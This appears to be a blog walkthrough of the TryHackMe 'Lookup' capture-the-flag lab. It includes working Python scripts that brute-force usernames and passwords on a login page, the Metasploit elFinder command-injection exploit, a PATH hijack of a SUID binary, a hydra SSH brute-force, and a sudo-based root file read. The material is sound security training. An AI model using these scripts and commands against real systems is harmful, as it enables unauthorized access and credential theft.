Lab link: https://tryhackme.com/room/lookup
Title: Test your enumeration skills on this boot-to-root machine
Description: Lookup offers a treasure trove of learning opportunities for aspiring hackers. This intriguing machine showcases various real-world vulnerabilities, ranging from web application weaknesses to privilege escalation techniques. By exploring and exploiting these vulnerabilities, hackers can sharpen their skills and gain invaluable experience in ethical hacking. Through “Lookup,” hackers can master the art of reconnaissance, scanning, and enumeration to uncover hidden services and subdomains. They will learn how to exploit web application vulnerabilities, such as command injection, and understand the significance of secure coding practices. The machine also challenges hackers to automate tasks, demonstrating the power of scripting in penetration testing.
Note: It is recommended to use your own VM if you’ll ever experience problems visualizing the site
Press enter or click to view image in full size
Find open ports: nmap TARGET_IP
Press enter or click to view image in full size
Perform version scan to discover more details about the services running on these open ports: nmap -sV -p22,80 TARGET_IP
Press enter or click to view image in full size
Visiting the IP address in web browser, did not respond , using wget to make a web request on the target IP address:
wget http://TARGET_IP:80/
Press enter or click to view image in full size
From above image it is clear that server is not responding to direct IP address instead expecting a request to a domain lookup.thm
Let’s map the target IP address to this domain lookup.thm in the system /etc/hosts file: sudo vim /etc/hosts
Now, by accessing the http://lookup.thm:80 in a web browser, a login page appears
Press enter or click to view image in full size
Tried multiple credentials & SQL injection techniques, but login failed & redirected back to the login page
Kept trying, but on submitting the credentials for the username adminthe response differs from the other invalid credentials
Press enter or click to view image in full size
The above response displays that the username was correct (in this case admin), this allows us to enumerate all the users of the application
Using following python script to brute force the login page to enumerate for the valid usernames on the target website
import requests
import urllib3
import sys#proxies = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}
url = "http://lookup.thm/login.php"
GREEN = '\033[32m'
RESET = '\033[0m'
def login_req(url, word):
data = {
"username":"%s" %word,
"password":"pass123"
}
res = requests.post(url=url, data=data, verify=False)
if "Wrong password" in res.text:
sys.stdout.write(GREEN + "\rUsername found: " + word + "\n" + RESET )
elif "Wrong username" in res.text:
sys.stdout.write('\r'+word)
sys.stdout.flush()
else:
sys.stdout.write(res.text)
sys.exit(-1)
if __name__ == "__main__":
if len(sys.argv) != 2:
print("[+] Usage: %s wordlist" %sys.argv[0])
print("[+] Example: %s /usr/share/seclists/Username/Name/names.txt" %sys.argv[0])
sys.exit(-1)
wordlist = sys.argv[1]
with open(wordlist, "r") as wordlist_file:
for line in wordlist_file:
word = line.strip()
login_req(url, word)
Press enter or click to view image in full size
Once usernames found perform brute-force against these two users to find their valid password. Here is the modified version of above script to brute-force the user’s password:
import requests
import urllib3
import sys#proxies = {'http':'http://127.0.0.1:8080', 'https':'http://127.0.0.1:8080'}
url = "http://lookup.thm/login.php"
# Color constants
RED = '\033[31m'
GREEN = '\033[32m'
RESET = '\033[0m'
def login_req_user(url, user, word):
data = {
"username":"%s" %user,
"password":"%s" %word
}
res = requests.post(url=url, data=data, verify=False)
if "Wrong password" not in res.text and "Wrong username" not in res.text:
print("Credentials Found: " + GREEN + user + " " + RED + word + RESET)
return "Found"
if "Wrong password" in res.text or "Wrong username" in res.text:
print("Credentials: " + GREEN + user + " " + RESET + word)
return "Not Found"
if __name__ == "__main__":
if len(sys.argv) != 3:
print("[+] Usage: %s user wordlist" %sys.argv[0])
sys.exit(-1)
user = sys.argv[1]
wordlist = sys.argv[2]
with open(wordlist, "r") as wordlist_file:
for line in wordlist_file:
word = line.strip()
status = login_req_user(url, user, word)
if status == "Found":
break
if status == "Not Found":
continue
Password for one non-admin user has been found:
Using these credentials login to the website, which redirects to another subdomain:
Press enter or click to view image in full size
To access this subdomain add it to the /etc/hosts file and refresh the page:
Once log in to to the website a file management interface is displayed on the page, but further exploring this page provides the detail about the software running as a file manager. Website is using the elFinder file manager having an outdated version 2.1.47
Press enter or click to view image in full size
Google search results displayed websites using elFinder Version 2.1.47 are vulnerable to the command injection vulnerability, allowing attacker to perform arbitrary command execution on the system “CVE-2019–9194”
Search for the exploit elFinder using Metasploit, make necessary changes and run the exploit to gain RCE on the system
Press enter or click to view image in full size
Press enter or click to view image in full size
thinkSearch for the SUID binary on the target machine using command: find / -type f -perm -04000 -ls 2>/dev/null
Result from above command contains an uncommon but suspicious SUID binary on the partial compromised system which should be further investigated
Press enter or click to view image in full size
By running /usr/sbin/pwm shows that it is using command id to display the username & user ID and appends that username to the /home/<USERNAME>/.password to do something with this file
Join Medium for free to get updates from this writer.
As the /usr/sbin/pwm is not using absolute path to the /bin/id , instead relying on the environment variable to locate the id command, so attacker can manipulate this SUID binary by exploiting to display any other result when id command is executed by the SUID:
/tmp directory having same name id as a command called by the SUID binary#!/bin/bash
echo "uid=1000(think) gid=1000(think) groups=1000(think)"2. Prepend /tmp directory as the first entry to your $PATH environment variable: export PATH=/tmp/id:$PATH
3. Execute the vulnerable SUID: /usr/sbin/pwm
Press enter or click to view image in full size
The output content can be used as a wordlist to bruteforce another service (SSH) running on this target machine
Create a wordlist from the content displayed by exploiting /usr/sbin/pwm SUID, and run a bruteforce attack against the user think using following command:hydra -l think -P wordlist_ssh.txt TARGET_IP ssh -t 5
Press enter or click to view image in full size
Once credentials found, login to the ssh as think user and obtain user.txt
rootOnce access gained to the user think, further enumerate the machine to look for privilege escalation to the super user root
Using sudo -l to list commands that user think can run with root privileges:
Press enter or click to view image in full size
Using /usr/bin/look to read /root/root.txt flag: sudo /usr/bin/look '' /root/root.txt
Press enter or click to view image in full size
If you want more walkthroughs on CTF challenges, detailed writeups on Web Hacking and exploitatoin techniques, follow me here on Medium to stay update and get notified